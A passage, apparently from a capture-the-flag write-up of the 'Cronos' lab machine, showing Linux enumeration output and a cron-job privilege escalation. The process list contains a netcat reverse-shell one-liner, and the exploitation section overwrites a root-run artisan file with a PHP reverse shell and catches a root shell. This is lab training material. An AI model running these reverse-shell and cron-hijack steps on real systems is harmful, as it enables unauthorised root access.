root 540 0.0 0.3 44700 4040 ? Ss 10:48 0:00 /lib/systemd/systemd-udevd
root 782 0.0 0.0 0 0 ? S< 10:48 0:00 [ext4-rsv-conver]
systemd+ 819 0.0 0.2 100324 2264 ? Ssl 10:48 0:00 /lib/systemd/systemd-timesyncd
message+ 929 0.0 0.3 42940 3896 ? Ss 10:48 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 951 0.0 0.2 29008 2756 ? Ss 10:48 0:00 /usr/sbin/cron -f
root 952 0.0 0.5 275860 6056 ? Ssl 10:48 0:00 /usr/lib/accountsservice/accounts-daemon
root 953 0.0 0.1 95368 1392 ? Ssl 10:48 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 954 0.0 0.3 256396 3268 ? Ssl 10:48 0:00 /usr/sbin/rsyslogd -n
daemon 957 0.0 0.2 26044 2068 ? Ss 10:48 0:00 /usr/sbin/atd -f
root 963 0.0 1.9 266532 20288 ? Ssl 10:48 0:00 /usr/lib/snapd/snapd
root 967 0.0 0.1 20100 1128 ? Ss 10:48 0:00 /lib/systemd/systemd-logind
root 969 0.1 1.0 192236 10196 ? Ssl 10:48 0:01 /usr/bin/vmtoolsd
root 989 0.0 0.1 4400 1292 ? Ss 10:48 0:00 /usr/sbin/acpid
root 1036 0.0 0.0 13376 152 ? Ss 10:48 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root 1037 0.0 0.5 277180 5924 ? Ssl 10:48 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 1190 0.0 0.5 65520 5828 ? Ss 10:48 0:00 /usr/sbin/sshd -D
bind 1191 0.0 1.9 208376 19556 ? Ssl 10:48 0:00 /usr/sbin/named -f -u bind -4
root 1217 0.0 0.0 5224 140 ? Ss 10:48 0:00 /sbin/iscsid
root 1218 0.0 0.3 5724 3516 ? S<Ls 10:48 0:00 /sbin/iscsid
mysql 1225 0.2 16.9 1132928 172456 ? Ssl 10:48 0:03 /usr/sbin/mysqld
root 1290 0.0 0.1 15940 1540 tty1 Ss+ 10:48 0:00 /sbin/agetty --noclear tty1 linux
root 1321 0.0 2.4 325588 24664 ? Ss 10:48 0:00 /usr/sbin/apache2 -k start
www-data 1345 0.0 1.7 326368 18004 ? S 10:48 0:00 /usr/sbin/apache2 -k start
www-data 1403 0.0 1.0 326160 10876 ? S 10:49 0:00 /usr/sbin/apache2 -k start
root 1495 0.0 0.0 0 0 ? S 10:54 0:00 [kworker/0:1]
www-data 3652 0.0 1.0 326160 10964 ? S 10:57 0:00 /usr/sbin/apache2 -k start
www-data 3661 0.0 1.6 326368 17036 ? S 10:57 0:00 /usr/sbin/apache2 -k start
www-data 3679 0.0 1.0 326160 10964 ? S 10:57 0:00 /usr/sbin/apache2 -k start
www-data 3685 0.0 1.7 326364 18080 ? S 10:57 0:00 /usr/sbin/apache2 -k start
www-data 3717 0.0 1.0 326160 10956 ? S 10:57 0:00 /usr/sbin/apache2 -k start
www-data 3725 0.0 1.1 326160 12192 ? S 10:57 0:00 /usr/sbin/apache2 -k start
www-data 3729 0.0 1.0 326160 11096 ? S 10:57 0:00 /usr/sbin/apache2 -k start
www-data 3736 0.0 1.0 326160 10956 ? S 10:57 0:00 /usr/sbin/apache2 -k start
root 3832 0.0 0.0 0 0 ? S 11:03 0:00 [kworker/0:0]
www-data 3992 0.0 0.0 4508 780 ? S 11:12 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.13 445 >/tmp/f
www-data 3995 0.0 0.0 4536 724 ? S 11:12 0:00 cat /tmp/f
www-data 3996 0.0 0.3 18216 3304 ? S 11:12 0:00 /bin/bash -i
www-data 3997 0.0 0.1 11304 1656 ? S 11:12 0:00 nc 10.10.14.13 445
www-data 4020 0.0 0.3 19028 4024 ? S 11:14 0:00 /bin/bash ./linenum.sh
www-data 4021 0.0 0.3 19072 3528 ? S 11:14 0:00 /bin/bash ./linenum.sh
www-data 4022 0.0 0.0 4384 672 ? S 11:14 0:00 tee -a
www-data 4223 0.0 0.2 19056 2828 ? S 11:15 0:00 /bin/bash ./linenum.sh
www-data 4224 0.0 0.2 34424 3000 ? R 11:15 0:00 ps aux
### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16
[-] MYSQL version:
mysql Ver 14.14 Distrib 5.7.17, for Linux (x86_64) using EditLine wrapper
[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built: 2016-07-14T12:32:26
[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
setenvif_module (shared)
status_module (shared)
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl
[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1667 Apr 9 2017 /etc/passwd
-rw-r--r-- 1 root root 832 Apr 9 2017 /etc/group
-rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
-rw-r----- 1 root shadow 1191 Apr 9 2017 /etc/shadow
[-] SUID files:
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Dec 16 2016 /bin/umount
-rwsr-xr-x 1 root root 40152 Dec 16 2016 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40128 Mar 29 2016 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 38984 Mar 7 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 56456 Feb 24 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 18 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Aug 11 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 40432 Mar 29 2016 /usr/bin/chsh
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 136808 Jan 20 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 49584 Mar 29 2016 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Mar 29 2016 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsr-xr-x 1 root root 23376 Jan 18 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 32944 Mar 29 2016 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75304 Mar 29 2016 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54256 Mar 29 2016 /usr/bin/passwd
[-] SGID files:
-rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root utmp 434216 Feb 7 2016 /usr/bin/screen
-rwxr-sr-x 1 root ssh 358624 Aug 11 2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 62336 Mar 29 2016 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36080 Apr 6 2016 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwxr-sr-x 1 root tty 27368 Dec 16 2016 /usr/bin/wall
-rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 22768 Mar 29 2016 /usr/bin/expiry
[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
-rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf
-rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 7788 Mar 22 2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 338 Nov 18 2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 100 Nov 25 2015 /etc/sos.conf
-rw-r--r-- 1 root root 1371 Jan 28 2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 350 Mar 22 2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 2084 Sep 6 2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf
-rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 6816 Nov 30 2016 /etc/overlayroot.conf
-rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 3028 Feb 15 2017 /etc/adduser.conf
-rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 191 Jan 19 2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 14867 Apr 12 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf
-rw-r--r-- 1 root root 703 May 6 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Mar 22 2017 /etc/kernel-img.confExploitation
During our post-exploitation enumeration we saw the following cronjob running under the context of root: php /var/www/laravel/artisan
This file is under our user's control, which means that this is a viable attack vector.
www-data@cronos:/var/www/laravel$ ls -la artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 artisanWe will create a reverse shell written in php and upload it to the server under the name of artisan, start a listener and wait for the cronjob to get executed.
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.13 - - [06/May/2023 10:23:28] "GET /artisan HTTP/1.1" 200 -nc -nlvp 445
listening on [any] 445 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53728
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
11:24:01 up 35 min, 0 users, load average: 0.00, 0.01, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
bash: cannot set terminal process group (4626): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:/# whoami
whoami
root
root@cronos:/#